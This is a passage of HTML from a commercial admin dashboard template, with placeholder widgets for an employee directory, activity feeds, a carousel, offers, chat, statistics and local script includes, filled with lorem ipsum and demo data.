<button type="button" class="btn btn-default pull-right"><i class="icon-search"></i></button>
<div class="overflow-hidden">
<input type="text" value="" class="form-control" placeholder="Find someone ..">
</div>
</div>
<select style="width: 100%;">
<optgroup label="Department">
<option value="design">Design</option>
<option value="development">Development</option>
</optgroup>
</select>
</form>
</div>
<span class="results">1490 Employees Found <i class="icon-circle-arrow-down"></i></span>
<ul class="list unstyled">
<li>
<div class="media innerAll">
<div class="media-object pull-left thumb hidden-phone"><img src="../../../../../common//theme/images/avatar-51x51.jpg" alt="Image" /></div>
<div class="media-body">
<span class="strong">Adrian Demian</span>
<span class="muted">contact@mosaicpro.biz</span>
<i class="icon-envelope"></i>
<i class="icon-phone"></i>
<i class="icon-skype"></i>
</div>
</div>
</li>
<li class="active">
<div class="media innerAll">
<div class="media-object pull-left thumb hidden-phone"><img src="../../../../../common//theme/images/avatar-51x51.jpg" alt="Image" /></div>
<div class="media-body">
<span class="strong">Adrian Demian</span>
<span class="muted">contact@mosaicpro.biz</span>
<i class="icon-envelope"></i>
<i class="icon-phone"></i>
<i class="icon-skype"></i>
</div>
</div>
</li>
<li>
<div class="media innerAll">
<div class="media-object pull-left thumb hidden-phone"><img src="../../../../../common//theme/images/avatar-51x51.jpg" alt="Image" /></div>
<div class="media-body">
<span class="strong">Adrian Demian</span>
<span class="muted">contact@mosaicpro.biz</span>
<i class="icon-envelope"></i>
<i class="icon-phone"></i>
<i class="icon-skype"></i>
</div>
</div>
</li>
<li>
<div class="media innerAll">
<div class="media-object pull-left thumb hidden-phone"><img src="../../../../../common//theme/images/avatar-51x51.jpg" alt="Image" /></div>
<div class="media-body">
<span class="strong">Adrian Demian</span>
<span class="muted">contact@mosaicpro.biz</span>
<i class="icon-envelope"></i>
<i class="icon-phone"></i>
<i class="icon-skype"></i>
</div>
</div>
</li>
<li>
<div class="media innerAll">
<div class="media-object pull-left thumb hidden-phone"><img src="../../../../../common//theme/images/avatar-51x51.jpg" alt="Image" /></div>
<div class="media-body">
<span class="strong">Adrian Demian</span>
<span class="muted">contact@mosaicpro.biz</span>
<i class="icon-envelope"></i>
<i class="icon-phone"></i>
<i class="icon-skype"></i>
</div>
</div>
</li>
<li>
<div class="media innerAll">
<div class="media-object pull-left thumb hidden-phone"><img src="../../../../../common//theme/images/avatar-51x51.jpg" alt="Image" /></div>
<div class="media-body">
<span class="strong">Adrian Demian</span>
<span class="muted">contact@mosaicpro.biz</span>
<i class="icon-envelope"></i>
<i class="icon-phone"></i>
<i class="icon-skype"></i>
</div>
</div>
</li>
<li>
<div class="media innerAll">
<div class="media-object pull-left thumb hidden-phone"><img src="../../../../../common//theme/images/avatar-51x51.jpg" alt="Image" /></div>
<div class="media-body">
<span class="strong">Adrian Demian</span>
<span class="muted">contact@mosaicpro.biz</span>
<i class="icon-envelope"></i>
<i class="icon-phone"></i>
<i class="icon-skype"></i>
</div>
</div>
</li>
<li>
<div class="media innerAll">
<div class="media-object pull-left thumb hidden-phone"><img src="../../../../../common//theme/images/avatar-51x51.jpg" alt="Image" /></div>
<div class="media-body">
<span class="strong">Adrian Demian</span>
<span class="muted">contact@mosaicpro.biz</span>
<i class="icon-envelope"></i>
<i class="icon-phone"></i>
<i class="icon-skype"></i>
</div>
</div>
</li>
<li>
<div class="media innerAll">
<div class="media-object pull-left thumb hidden-phone"><img src="../../../../../common//theme/images/avatar-51x51.jpg" alt="Image" /></div>
<div class="media-body">
<span class="strong">Adrian Demian</span>
<span class="muted">contact@mosaicpro.biz</span>
<i class="icon-envelope"></i>
<i class="icon-phone"></i>
<i class="icon-skype"></i>
</div>
</div>
</li>
<li>
<div class="media innerAll">
<div class="media-object pull-left thumb hidden-phone"><img src="../../../../../common//theme/images/avatar-51x51.jpg" alt="Image" /></div>
<div class="media-body">
<span class="strong">Adrian Demian</span>
<span class="muted">contact@mosaicpro.biz</span>
<i class="icon-envelope"></i>
<i class="icon-phone"></i>
<i class="icon-skype"></i>
</div>
</div>
</li>
</ul>
</div>
<div class="col-md-8 detailsWrapper">
<div class="ajax-loading hide">
<i class="icon-spinner icon-spin icon-4x"></i>
</div>
<div class="innerAll">
<div class="title">
<div class="row">
<div class="col-md-8">
<h3 class="text-primary">Adrian Demian</h3>
<span class="muted">Senior Designer</span>
</div>
<div class="col-md-4 text-right">
<p class="muted">4 projects <a href=""><i class="icon-circle-arrow-right"></i></a></p>
<div class="margin-bottom-none progress progress-small progress-inverse count-outside">
<div class="count">30%</div>
<div class="progress-bar" role="progressbar" aria-valuenow="30" style="width: 30%;"></div>
</div>
</div>
</div>
</div>
<hr/>
<div class="body">
<div class="row">
<div class="col-md-4 overflow-hidden">
<!-- Profile Photo -->
<div><a href="" class="thumb inline-block"><img src="../../../../../common/theme/images/avatar-2-large.jpg" alt="Profile" /></a></div>
<div class="separator bottom"></div>
<!-- // Profile Photo END -->
<ul class="icons-ul separator bottom">
<li><i class="icon-envelope icon-li icon-fixed-width"></i> contac@mosaicpro.biz</li>
<li><i class="icon-phone icon-li icon-fixed-width"></i> 00353 9191238101</li>
<li><i class="icon-skype icon-li icon-fixed-width"></i> mosaicpro</li>
</ul>
</div>
<div class="col-md-8 padding-none">
<h5 class="strong">About</h5>
<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>
<div class="row">
<div class="col-md-4 padding-none">
<h5 class="strong">Reports</h5>
<a href="" class="btn btn-primary btn-small btn-block"><i class="icon-download-alt icon-fixed-width"></i> June</a>
<a href="" class="btn btn-inverse btn-small btn-block"><i class="icon-download-alt icon-fixed-width"></i> May</a>
<a href="" class="btn btn-inverse btn-small btn-block"><i class="icon-download-alt icon-fixed-width"></i> April</a>
<div class="separator bottom"></div>
</div>
<div class="col-md-7 col-md-offset-1 padding-none">
<h5 class="strong">Skills</h5>
<div class="progress progress-mini count-outside-primary add-outside">
<div class="count">100%</div>
<div class="progress-bar progress-bar-primary" style="width: 100%;"></div>
<div class="add">HTML</div>
</div>
<div class="progress progress-mini count-outside-primary add-outside">
<div class="count">90%</div>
<div class="progress-bar progress-bar-primary" style="width: 90%;"></div>
<div class="add">CSS</div>
</div>
<div class="progress progress-mini count-outside-primary add-outside">
<div class="count">93%</div>
<div class="progress-bar progress-bar-primary" style="width: 93%;"></div>
<div class="add">jQuery</div>
</div>
<div class="progress progress-mini count-outside-primary add-outside">
<div class="count">79%</div>
<div class="progress-bar progress-bar-primary" style="width: 79%;"></div>
<div class="add">PHP</div>
</div>
<div class="progress progress-mini count-outside add-outside">
<div class="count">20%</div>
<div class="progress-bar" style="width: 20%;"></div>
<div class="add">WP</div>
</div>
<div class="separator bottom"></div>
</div>
</div>
<h5 class="text-uppercase strong text-primary"><i class="icon-group text-regular icon-fixed-width"></i> MosaicPro <span class="text-lowercase strong padding-none">Team</span> <span class="text-lowercase padding-none">(2 people)</span></h5>
<ul class="team">
<li><span class="crt">1</span><span class="strong">Adrian Demian</span><span class="muted">Senior Designer</span></li>
<li><span class="crt">2</span><span class="strong">Laza Bogdan</span><span class="muted">Senior Developer</span></li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- // Widget END -->
<p class="separator text-center"><i class="icon-ellipsis-horizontal icon-3x"></i></p>
<!-- Widget -->
<h2 class="margin-none separator bottom"><i class="icon-time text-primary icon-fixed-width"></i> Recent Activity</h2>
<!-- Stats Widgets -->
<div class="row">
<div class="col-md-3">
<a href="" class="widget-stats widget-stats-default widget-stats-5">
<span class="glyphicons cart_in"><i></i></span>
<span class="txt">Latest<span>Orders</span></span>
<div class="clearfix"></div>
</a>
</div>
<div class="col-md-3">
<a href="" class="widget-stats widget-stats-info widget-stats-5">
<span class="glyphicons envelope"><i></i></span>
<span class="txt">New<span>Emails</span></span>
<div class="clearfix"></div>
</a>
</div>
<div class="col-md-3">
<a href="" class="widget-stats widget-stats-inverse widget-stats-5">
<span class="glyphicons parents"><i></i></span>
<span class="txt">Recent<span>Signups</span></span>
<div class="clearfix"></div>
</a>
</div>
<div class="col-md-3">
<a href="" class="widget-stats widget-stats-primary widget-stats-5">
<span class="glyphicons wifi_alt"><i></i></span>
<span class="txt">User<span>Activity</span></span>
<div class="clearfix"></div>
</a>
</div>
</div>
<div class="separator bottom"></div>
<!-- // Stats Widgets END -->
<div class="widget widget-heading-simple widget-body-simple">
<div class="widget-body">
<div class="widget widget-tabs widget-tabs-icons-only-2 widget-activity margin-none widget-tabs-gray">
<!-- Tabs Heading -->
<div class="widget-head">
<ul>
<li><a class="glyphicons user_add" data-toggle="tab" href="#filterUsersTab"><i></i>Users</a></li>
<li><a class="glyphicons shopping_cart" data-toggle="tab" href="#filterOrdersTab"><i></i>Orders</a></li>
<li class="active"><a class="glyphicons envelope" data-toggle="tab" href="#filterMessagesTab"><i></i></a></li>
<li><a class="glyphicons link" data-toggle="tab" href="#filterLinksTab"><i></i></a></li>
<li><a class="glyphicons camera" data-toggle="tab" href="#filterPhotosTab"><i></i></a></li>
</ul>
</div>
<!-- // Tabs Heading END -->
<div class="widget-body">
<div class="tab-content">
<!-- Filter Users Tab -->
<div class="tab-pane" id="filterUsersTab">
<ul class="list">
<!-- Activity item -->
<li>
<span class="date">21/03</span>
<span class="glyphicons activity-icon user_add"><i></i></span>
<span class="ellipsis"><a href="">Martin Glades</a> registered at <a href="">Jane Doe's</a> suggestion.</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
<!-- Activity item -->
<li>
<span class="date">21/03</span>
<span class="glyphicons activity-icon user_add"><i></i></span>
<span class="ellipsis"><a href="">Darius Jackson</a> registered at <a href="">Darius Jackson's</a> suggestion.</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
<!-- Activity item -->
<li>
<span class="date">21/03</span>
<span class="glyphicons activity-icon user_add"><i></i></span>
<span class="ellipsis"><a href="">Jane Doe</a> registered at <a href="">John Doe's</a> suggestion.</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
<!-- Activity item -->
<li>
<span class="date">21/03</span>
<span class="glyphicons activity-icon user_add"><i></i></span>
<span class="ellipsis"><a href="">Jane Doe</a> registered at <a href="">Darius Jackson's</a> suggestion.</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
<!-- Activity item -->
<li>
<span class="date">21/03</span>
<span class="glyphicons activity-icon user_add"><i></i></span>
<span class="ellipsis"><a href="">John Doe</a> registered at <a href="">Jane Doe's</a> suggestion.</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
</ul>
</div>
<!-- // Filter Users Tab END -->
<!-- Filter Orders Tab -->
<div class="tab-pane" id="filterOrdersTab">
<ul class="list">
<!-- Activity item -->
<li>
<span class="date">21/03</span>
<span class="glyphicons activity-icon shopping_cart"><i></i></span>
<span class="ellipsis"><a href="">John Doe</a> bought 10 items worth of €50 (<a href="">order #2301</a>)</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
<!-- Activity item -->
<li>
<span class="date">21/03</span>
<span class="glyphicons activity-icon shopping_cart"><i></i></span>
<span class="ellipsis"><a href="">Martin Glades</a> bought 10 items worth of €50 (<a href="">order #2302</a>)</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
<!-- Activity item -->
<li>
<span class="date">21/03</span>
<span class="glyphicons activity-icon shopping_cart"><i></i></span>
<span class="ellipsis"><a href="">Melisa Ragae</a> bought 10 items worth of €50 (<a href="">order #2303</a>)</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
<!-- Activity item -->
<li>
<span class="date">21/03</span>
<span class="glyphicons activity-icon shopping_cart"><i></i></span>
<span class="ellipsis"><a href="">Darius Jackson</a> bought 10 items worth of €50 (<a href="">order #2304</a>)</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
<!-- Activity item -->
<li>
<span class="date">21/03</span>
<span class="glyphicons activity-icon shopping_cart"><i></i></span>
<span class="ellipsis"><a href="">Melisa Ragae</a> bought 10 items worth of €50 (<a href="">order #2305</a>)</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
</ul>
</div>
<!-- // Filter Orders Tab END -->
<!-- Filter Messages Tab -->
<div class="tab-pane active" id="filterMessagesTab">
<ul class="list">
<!-- Activity item -->
<li class="double">
<span class="glyphicons activity-icon envelope"><i></i></span>
<span class="ellipsis">
You have received an email from <a href="">Jane Doe</a> (jane.doe@lovely-email.net)
<span class="meta">on 29 March, 2013 <span>1 hour ago</span></span>
</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
<!-- Activity item -->
<li class="double highlight">
<span class="glyphicons activity-icon envelope"><i></i></span>
<span class="ellipsis">
You have received an email from <a href="">Melisa Ragae</a> (melisa.ragae@grr-email.net)
<span class="meta">on 29 March, 2013 <span>1 hour ago</span></span>
</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
<!-- Activity item -->
<li class="double highlight">
<span class="glyphicons activity-icon envelope"><i></i></span>
<span class="ellipsis">
You have received an email from <a href="">Melisa Ragae</a> (melisa.ragae@grr-email.net)
<span class="meta">on 29 March, 2013 <span>1 hour ago</span></span>
</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
<!-- Activity item -->
<li class="double">
<span class="glyphicons activity-icon envelope"><i></i></span>
<span class="ellipsis">
You have received an email from <a href="">John Doe</a> (john.doe@fake-email.net)
<span class="meta">on 29 March, 2013 <span>1 hour ago</span></span>
</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
<!-- Activity item -->
<li class="double">
<span class="glyphicons activity-icon envelope"><i></i></span>
<span class="ellipsis">
You have received an email from <a href="">Martin Glades</a> (martin.glades@wee-email.com)
<span class="meta">on 29 March, 2013 <span>1 hour ago</span></span>
</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
</ul>
</div>
<!-- // Filter Messages Tab END -->
<!-- Filter Links Tab -->
<div class="tab-pane" id="filterLinksTab">
<ul class="list">
<!-- Activity item -->
<li>
<span class="date">21/03</span>
<span class="glyphicons activity-icon link"><i></i></span>
<span class="ellipsis"><a href="">Melisa Ragae</a> bought 10 items worth of €50 (<a href="">order #2301</a>)</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
<!-- Activity item -->
<li>
<span class="date">21/03</span>
<span class="glyphicons activity-icon link"><i></i></span>
<span class="ellipsis"><a href="">Darius Jackson</a> bought 10 items worth of €50 (<a href="">order #2302</a>)</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
<!-- Activity item -->
<li>
<span class="date">21/03</span>
<span class="glyphicons activity-icon link"><i></i></span>
<span class="ellipsis"><a href="">Jane Doe</a> bought 10 items worth of €50 (<a href="">order #2303</a>)</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
<!-- Activity item -->
<li>
<span class="date">21/03</span>
<span class="glyphicons activity-icon link"><i></i></span>
<span class="ellipsis"><a href="">Martin Glades</a> bought 10 items worth of €50 (<a href="">order #2304</a>)</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
<!-- Activity item -->
<li>
<span class="date">21/03</span>
<span class="glyphicons activity-icon link"><i></i></span>
<span class="ellipsis"><a href="">Darius Jackson</a> bought 10 items worth of €50 (<a href="">order #2305</a>)</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
</ul>
</div>
<!-- // Filter Links Tab END -->
<!-- Filter Photos Tab -->
<div class="tab-pane" id="filterPhotosTab">
<ul class="list">
<!-- Activity item -->
<li>
<span class="date">21/03</span>
<span class="glyphicons activity-icon camera"><i></i></span>
<span class="ellipsis"><a href="">Melisa Ragae</a> bought 10 items worth of €50 (<a href="">order #2301</a>)</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
<!-- Activity item -->
<li>
<span class="date">21/03</span>
<span class="glyphicons activity-icon camera"><i></i></span>
<span class="ellipsis"><a href="">Jane Doe</a> bought 10 items worth of €50 (<a href="">order #2302</a>)</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
<!-- Activity item -->
<li>
<span class="date">21/03</span>
<span class="glyphicons activity-icon camera"><i></i></span>
<span class="ellipsis"><a href="">John Doe</a> bought 10 items worth of €50 (<a href="">order #2303</a>)</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
<!-- Activity item -->
<li>
<span class="date">21/03</span>
<span class="glyphicons activity-icon camera"><i></i></span>
<span class="ellipsis"><a href="">Melisa Ragae</a> bought 10 items worth of €50 (<a href="">order #2304</a>)</span>
<div class="clearfix"></div>
</li>
<!-- // Activity item END -->
</ul>
</div>
<!-- // Filter Photos Tab END -->
</div>
</div>
</div>
</div>
</div>
<p class="separator text-center"><i class="icon-ellipsis-horizontal icon-3x"></i></p>
<!-- Carousel -->
<h2 class="margin-none separator bottom"><i class="icon-picture text-primary icon-fixed-width"></i> Carousel</h2>
<div class="widget widget-heading-simple widget-body-simple">
<div class="widget-body">
<div class="carousel carousel-1 slide" id="myCarousel">
<div class="carousel-inner">
<!-- Item -->
<div class="item active">
<div class="row">
<div class="col-md-5 relativeWrap">
<div class="carousel-caption">
<h4>Get this item now!</h4>
<p>Cras justo odio, dapibus ac facilisis in, egestas eget quam. Donec id elit non mi porta gravida at eget metus. Nullam id dolor id nibh ultricies vehicula ut.<br/> <a href="" class="separator top" target="_blank">Buy QuickAdmin</a></p>
</div>
</div>
<div class="col-md-7">
<img src="../../../../../common/theme/images/gallery-2/8.jpg" alt="" />
</div>
</div>
</div>
<!-- // Item END -->
<!-- Item -->
<div class="item">
<div class="row">
<div class="col-md-5 relativeWrap">
<div class="carousel-caption">
<h4>Get this item now!</h4>
<p>Cras justo odio, dapibus ac facilisis in, egestas eget quam. Donec id elit non mi porta gravida at eget metus. Nullam id dolor id nibh ultricies vehicula ut.<br/> <a href="" class="separator top" target="_blank">Buy QuickAdmin</a></p>
</div>
</div>
<div class="col-md-7">
<img src="../../../../../common/theme/images/gallery-2/9.jpg" alt="" />
</div>
</div>
</div>
<!-- // Item END -->
<!-- Item -->
<div class="item">
<div class="row">
<div class="col-md-5 relativeWrap">
<div class="carousel-caption">
<h4>Get this item now!</h4>
<p>Cras justo odio, dapibus ac facilisis in, egestas eget quam. Donec id elit non mi porta gravida at eget metus. Nullam id dolor id nibh ultricies vehicula ut.<br/> <a href="" class="separator top" target="_blank">Buy QuickAdmin</a></p>
</div>
</div>
<div class="col-md-7">
<img src="../../../../../common/theme/images/gallery-2/10.jpg" alt="" />
</div>
</div>
</div>
<!-- // Item END -->
</div>
<ol class="carousel-indicators">
<li data-target="#myCarousel" data-slide-to="0" class="active"></li>
<li data-target="#myCarousel" data-slide-to="1"></li>
<li data-target="#myCarousel" data-slide-to="2"></li>
</ol>
</div>
</div>
</div>
<!-- // Carousel END -->
<h2 class="margin-none separator bottom"><i class="icon-gift text-primary icon-fixed-width"></i> Special Offers</h2>
<div class="row">
<div class="col-md-6">
<!-- Widget -->
<div class="widget widget-heading-simple widget-body-gray widget-body-multiple widget-offers">
<div class="widget-body">
<!-- Media item -->
<div class="media">
<img class="media-object pull-left thumb hidden-tablet hidden-phone" data-src="holder.js/100x100/dark" alt="Image" />
<div class="media-body">
<h5><a href="">Product or Service Name</a></h5>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Proin vitae accumsan mauris. Donec vitae nibh</p>
<div class="row">
<div class="col-md-6 tablet-column-reset">
<span class="price">Price: <strong>$29.90</strong></span>
</div>
<div class="col-md-6 text-right tablet-column-reset">
<button type="button" class="btn btn-inverse btn-icon glyphicons shopping_cart btn-small"><i></i>Purchase</button>
</div>
</div>
</div>
</div>
<!-- // Media item END -->
</div>
</div>
<!-- // Widget END -->
</div>
<div class="col-md-6">
<!-- Widget -->
<div class="widget widget-heading-simple widget-body-gray widget-body-multiple widget-offers">
<div class="widget-body">
<!-- Media item -->
<div class="media">
<img class="media-object pull-left thumb hidden-tablet hidden-phone" data-src="holder.js/100x100/dark" alt="Image" />
<div class="media-body">
<h5><a href="">Product or Service Name</a></h5>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Proin vitae accumsan mauris. Donec vitae nibh</p>
<div class="row">
<div class="col-md-6 tablet-column-reset">
<span class="price">Price: <strong>$29.90</strong></span>
</div>
<div class="col-md-6 text-right tablet-column-reset">
<button type="button" class="btn btn-inverse btn-icon glyphicons shopping_cart btn-small"><i></i>Purchase</button>
</div>
</div>
</div>
</div>
<!-- // Media item END -->
</div>
</div>
<!-- // Widget END -->
</div>
</div>
<p class="separator text-center"><i class="icon-ellipsis-horizontal icon-3x"></i></p>
<!-- Chat -->
<h2 class="margin-none separator bottom"><i class="icon-comments text-primary icon-fixed-width"></i> Chat</h2>
<div class="widget widget-heading-simple widget-body-white widget-chat">
<div class="widget-body">
<!-- Slim Scroll -->
<div class="slim-scroll chat-items" data-scroll-height="190px" data-scroll-size="0">
<!-- Media item -->
<div class="media">
<small class="author"><a href="#" title="" class="strong">Martin</a></small>
<div class="media-object pull-left thumb"><img src="../../../../../common//theme/images/avatar-51x51.jpg" alt="Image" /></div>
<div class="media-body">
<blockquote>
<small class="date"><cite>just now</cite></small>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Proin vitae accumsan mauris. Donec vitae nibh felis, facilisis bibendum sapien.</p>
</blockquote>
</div>
</div>
<!-- // Media item END -->
<!-- Media item -->
<div class="media right">
<small class="author"><a href="#" title="" class="strong">John Doe</a></small>
<div class="media-object pull-right thumb"><img src="../../../../../common//theme/images/avatar-51x51.jpg" alt="Image" /></div>
<div class="media-body">
<blockquote class="pull-right">
<small class="date"><cite>15 seconds ago</cite></small>
<p>In ultricies ante eget tortor euismod vitae molestie eros hendrerit. Cras tristique, orci ac lacinia aliquet, velit risus laoreet lectus, eget sollicitudin metus orci non nulla.</p>
</blockquote>
</div>
</div>
<!-- // Media item END -->
<!-- Media item -->
<div class="media">
<small class="author"><a href="#" title="" class="strong">Ricky</a></small>
<div class="media-object pull-left thumb"><img src="../../../../../common//theme/images/avatar-51x51.jpg" alt="Image" /></div>
<div class="media-body">
<blockquote>
<small class="date"><cite>5 minutes ago</cite></small>
<p>Pellentesque ac turpis turpis. Aliquam erat volutpat. Proin semper auctor mauris vel tempor. Ut eget turpis neque. Nam ultricies tortor eu odio ultricies euismod.</p>
</blockquote>
</div>
</div>
<!-- // Media item END -->
</div>
<!-- // Slim Scroll END -->
</div>
<div class="chat-controls">
<div class="innerLR">
<form class="margin-none">
<div class="row">
<div class="col-md-10">
<input type="text" name="message" class="input-block-level form-control margin-none" placeholder="Type your message .." />
</div>
<div class="col-md-2">
<button type="submit" class="btn btn-block btn-primary">Send</button>
</div>
</div>
</form>
</div>
</div>
</div>
<!-- // Chat END -->
</div>
<div class="col-md-3 tablet-column-reset">
<h2 class="margin-none separator bottom"><i class="icon-external-link-sign icon-fixed-width text-primary"></i>Statistics</h2>
<a href="" class="widget-stats widget-stats-2 widget-stats-easy-pie widget-stats-primary">
<div data-percent="23" class="easy-pie primary easyPieChart"><span class="value">23</span>%</div>
<span class="txt"><span class="count text-large inline-block">130</span> ROI</span>
<div class="clearfix"></div>
</a>
<div class="separator bottom"></div>
<a href="" class="widget-stats widget-stats-2 widget-stats-gray widget-stats-easy-pie txt-single">
<div data-percent="35" class="easy-pie primary easyPieChart"><span class="value">35</span>%</div>
<span class="txt">Server workload</span>
<div class="clearfix"></div>
</a>
<div class="separator bottom"></div>
<a href="" class="widget-stats widget-stats-2">
<div class="sparkline"></div>
<span class="txt"><span class="count text-large text-primary inline-block">566</span> Visits</span>
<div class="clearfix"></div>
</a>
<p class="separator text-center"><i class="icon-ellipsis-horizontal icon-3x"></i></p>
<!-- Activity/List Widget -->
<h2 class="margin-none separator bottom"><i class="icon-signal text-primary icon-fixed-width"></i> Activity</h2>
<div class="widget widget-heading-simple widget-body-gray" data-toggle="collapse-widget">
<div class="widget-body list">
<ul>
<!-- List item -->
<li>
<span>Sales today</span>
<span class="count">€5,900</span>
</li>
<!-- // List item END -->
<!-- List item -->
<li>
<span>Some other stats</span>
<span class="count">36,900</span>
</li>
<!-- // List item END -->
<!-- List item -->
<li>
<span>Some stunning stats</span>
<span class="count">26,999</span>
</li>
<!-- // List item END -->
<!-- List item -->
<li>
<span>Awesome stats</span>
<span class="count">4,900</span>
</li>
<!-- // List item END -->
</ul>
</div>
</div>
<!-- // Activity/List Widget END -->
<!-- Latest Orders/List Widget -->
<h2 class="margin-none separator bottom"><i class="icon-shopping-cart icon-fixed-width text-primary"></i>Last orders</h2>
<div class="widget widget-heading-simple widget-body-gray">
<div class="widget-body list products">
<ul>
<!-- List item -->
<li>
<span class="img"><img data-src="holder.js/40x40/dark" class="thumb" /></span>
<span class="title">10 items<br/><strong>€5,900.00</strong></span>
<span class="count"></span>
</li>
<!-- // List item END -->
<!-- List item -->
<li>
<span class="img"><img data-src="holder.js/40x40/dark" class="thumb" /></span>
<span class="title">Product name<br/><strong>€2,900</strong></span>
<span class="count"></span>
</li>
<!-- // List item END -->
</ul>
</div>
</div>
<!-- // Latest Orders/List Widget END -->
<!-- Widget -->
<h2 class="margin-none separator bottom"><i class="icon-file-text icon-fixed-width text-primary"></i>Notes</h2>
<div class="widget widget-heading-simple widget-body-gray">
<div class="widget-body">
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Mauris eu diam eros. Etiam consequat, quam eu molestie tempus, dui elit volutpat massa, at consectetur ligula nunc ac massa. Phasellus quis ante libero, quis accumsan purus. Pellentesque rhoncus accumsan interdu
</div>
</div>
<!-- // Widget END -->
<div class="alert alert-primary">
<a class="close" data-dismiss="alert">×</a>
<p>Integer quis tempor mi. Donec venenatis dui in neque fringilla at iaculis libero ullamcorper. In velit sem, sodales id hendrerit ac, fringilla et est.</p>
</div>
<!-- Widget -->
<h2 class="margin-none separator bottom"><i class="icon-twitter icon-fixed-width text-primary"></i>Twitter Feed</h2>
<div class="widget widget-heading-simple widget-body-white">
<div class="widget-body">
<div class="jstwitter" data-gridalicious="false" data-type="slide" data-images="false"><span class="label">Loading .. </span></div>
</div>
</div>
<!-- // Widget END -->
</div>
</div>
</div>
</div>
<!-- // Content END -->
</div>
<div class="clearfix"></div>
<!-- // Sidebar menu & content wrapper END -->
<div id="footer" class="hidden-print">
<!-- Copyright Line -->
<div class="copy">© 2012 - 2013 - <a href="http://www.mosaicpro.biz">MosaicPro</a> - All Rights Reserved. <a href="http://themeforest.net/?ref=mosaicpro" target="_blank">Purchase FLAT KIT on ThemeForest</a> - Current version: v2.0.0 / <a target="_blank" href="http://demo.mosaicpro.biz/flatkit/CHANGELOG">changelog</a></div>
<!-- End Copyright Line -->
</div>
<!-- // Footer END -->
</div>
<!-- // Main Container Fluid END -->
<!-- Themer -->
<div id="themer" class="collapse">
<div class="wrapper">
<span class="close2">× close</span>
<h4>Themer <span>color options</span></h4>
<ul>
<li>Theme: <select id="themer-theme" class="pull-right"></select><div class="clearfix"></div></li>
<li>Primary Color: <input type="text" data-type="minicolors" data-default="#ffffff" data-slider="hue" data-textfield="false" data-position="left" id="themer-primary-cp" /><div class="clearfix"></div></li>
<li>
<span class="link" id="themer-custom-reset">reset theme</span>
<span class="pull-right"><label>advanced <input type="checkbox" value="1" id="themer-advanced-toggle" /></label></span>
</li>
</ul>
<div id="themer-getcode" class="hide">
<hr class="separator" />
<button class="btn btn-primary btn-small pull-right btn-icon glyphicons download" id="themer-getcode-less"><i></i>Get LESS</button>
<button class="btn btn-inverse btn-small pull-right btn-icon glyphicons download" id="themer-getcode-css"><i></i>Get CSS</button>
<div class="clearfix"></div>
</div>
</div>
</div>
<!-- // Themer END -->
<!-- Modal Gallery -->
<div id="modal-gallery" class="modal modal-gallery hide fade hidden-print" tabindex="-1">
<div class="modal-header">
<a class="close" data-dismiss="modal">×</a>
<h3 class="modal-title"></h3>
</div>
<div class="modal-body"><div class="modal-image"></div></div>
<div class="modal-footer">
<a class="btn btn-primary modal-next">Next <i class="icon-arrow-right icon-white"></i></a>
<a class="btn btn-info modal-prev"><i class="icon-arrow-left icon-white"></i> Previous</a>
<a class="btn btn-success modal-play modal-slideshow" data-slideshow="5000"><i class="icon-play icon-white"></i> Slideshow</a>
<a class="btn modal-download" target="_blank"><i class="icon-download"></i> Download</a>
</div>
</div>
<!-- // Modal Gallery END -->
<!-- jQuery Event Move -->
<script src="../../../../../common/theme/scripts/plugins/system/jquery.event.move/js/jquery.event.move.js"></script>
<!-- jQuery Event Swipe -->
<script src="../../../../../common/theme/scripts/plugins/system/jquery.event.swipe/js/jquery.event.swipe.js"></script>
<!-- Code Beautify -->
<script src="../../../../../common/theme/scripts/plugins/other/js-beautify/beautify.js"></script>
<script src="../../../../../common/theme/scripts/plugins/other/js-beautify/beautify-html.js"></script>
<!-- PrettyPhoto -->
<script src="../../../../../common/theme/scripts/plugins/gallery/prettyphoto/js/jquery.prettyPhoto.js"></script>
<!-- JQueryUI -->
<script src="../../../../../common/theme/scripts/plugins/system/jquery-ui/js/jquery-ui-1.9.2.custom.min.js"></script>
<!-- JQueryUI Touch Punch -->
<!-- small hack that enables the use of touch events on sites using the jQuery UI user interface library -->
<script src="../../../../../common/theme/scripts/plugins/system/jquery-ui-touch-punch/jquery.ui.touch-punch.min.js"></script>
<!-- Modernizr -->
<script src="../../../../../common/theme/scripts/plugins/system/modernizr.js"></script>
<!-- Bootstrap -->
<script src="../../../../../common/bootstrap/js/bootstrap.min.js"></script>
<!-- SlimScroll Plugin -->
<script src="../../../../../common/theme/scripts/plugins/other/jquery-slimScroll/old/jquery.slimscroll.js"></script>
<!-- Holder Plugin -->
<script src="../../../../../common/theme/scripts/plugins/other/holder/holder.js?1382019475"></script>
<!-- Uniform Forms Plugin -->
